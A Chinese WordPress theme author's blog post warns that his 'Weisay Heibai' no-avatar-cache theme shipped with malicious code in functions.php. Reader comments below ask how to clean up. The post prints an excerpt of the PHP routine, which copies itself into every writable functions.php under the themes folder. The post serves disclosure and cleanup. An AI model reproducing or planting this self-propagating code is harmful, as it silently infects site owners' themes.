当前位置: 首页 > 设计 > 正文
avatar

主题(『Weisay Heibai』无缓存头像版)中的functions.php被插入了恶意代码,这段代码会感染主题文件夹下的其他主题,可能会把这段代码复制到其他主题的functions.php下面。

今天朋友说我的主题(『Weisay Heibai』无缓存头像版)中的functions.php被插入了恶意代码,我感到非常的震惊,赶紧下载打开查证,果然发现了恶意代码,现在我已经删掉了此段恶意代码,主题包也已经更新过了,请下载使用过的朋友赶紧删除主题文件夹下面的functions.php,重新下载我新上传主题包中的functions.php。

这段代码会感染主题文件夹下的其他主题,可能会把这段代码复制到其他主题的functions.php下面,所以很抱歉,大家要修正不仅仅是『Weisay Heibai』无缓存头像版,还有你主题文件夹下的其他主题,请使用的朋友特别注意检查下,看有没有问题,我深感抱歉。

WordPress黑白主题『Weisay Heibai』我发布2个版本,『Weisay Heibai』无缓存头像版 是我后来发布的版本,开始使用的人可能不知道,『Weisay Heibai』缓存头像版是没有问题的,只有『Weisay Heibai』无缓存头像版 有问题。

前几天帮人家修改了主题,可能导致这个问题的发生,开始我也不知道竟然还有这个东东,感谢zwwooooo的提醒。

希望用过我主题的朋友,都检查下主题的functions.php,看看其中有没有类似这段,这段恶意代码很长,我截取前面一段。

function _verifyactivate_widgets(){
	$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
	$output=strip_tags($output, $allowed);
	$direst=_get_allwidgets_cont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
	if (is_array($direst)){
		foreach ($direst as $item){
			if (is_writable($item)){
				$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
				$cont=file_get_contents($item);
				if (stripos($cont,$ftion) === false){
					$comaar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
					$output .= $before . "Not found" . $after;
					if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
					$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $comaar . "\n" .$widget);fclose($f);
					$output .= ($isshowdots && $ellipsis) ? "..." : "";
				}
			}
		}
	}

我主题正常的functions.php在

add_filter('the_content', 'password_hint');
//全部设置结束
?>

之后就结束了,后面还有其他代码的话就说明有问题了。

希望使用我主题的朋友都检查下,再次深感抱歉,以后我会严格检查我的主题的。

本文固定链接: http://www.weisay.com/blog/weisay-heibai-no-gravatar-cache-update.html | 威言威语

【特别注意】主题『Weisay Heibai』无缓存头像版重大更新:目前有125 条评论

  1. avatar
    63楼
    蛋疼哥 Google Chrome Windows

    表示我中了,删不掉,一直感染其他主题,后来还是删除了

    2013-05-07 00:27 [回复]
  2. avatar
    62楼
    javis 360安全浏览器 Windows

    只传functions.php行吗

    2012-08-02 15:22 [回复]
    • avatar
      William Google Chrome Windows

      可能其他主题会被感染,只修改一个不一定确保所以的都正常,你可以先试试。

      2012-08-02 16:00 [回复]
      • avatar
        javis 360安全浏览器 Windows

        其他主题已经悲剧了,都改了,只改这个文件有用吗,会不会还有哪儿有

        2012-08-02 16:02 [回复]
        • avatar
          William Google Chrome Windows

          貌似只会感染functions.php。你删除每个主题的functions.php里面的感染代码应该也可以。

          2012-08-02 16:06 [回复]
          • avatar
            javis 360安全浏览器 Windows

            谢啦。我也不知道这个代码是哪来的。 :cry:

            2012-08-02 16:08 [回复]
  3. avatar
    61楼
    javis 360安全浏览器 Windows

    lz问下,我把后面那段直接删了,行不?还有我是今天刚下载的黑白,还是有这段代码。

    2012-08-02 14:53 [回复]
    • avatar
      William Google Chrome Windows

      刚刚又下载看了下,是正常的,建议你删掉主题文件夹里面的全部主题,然后重新上传主题。

      2012-08-02 15:18 [回复]
      • avatar
        javis 360安全浏览器 Windows

        好狠,要全删。。我改了很多了

        2012-08-02 15:21 [回复]

发表评论

question razz sad smile redface biggrin surprised eek confused cool lol mad rolleyes wink neutral cry

快捷键:Ctrl+Enter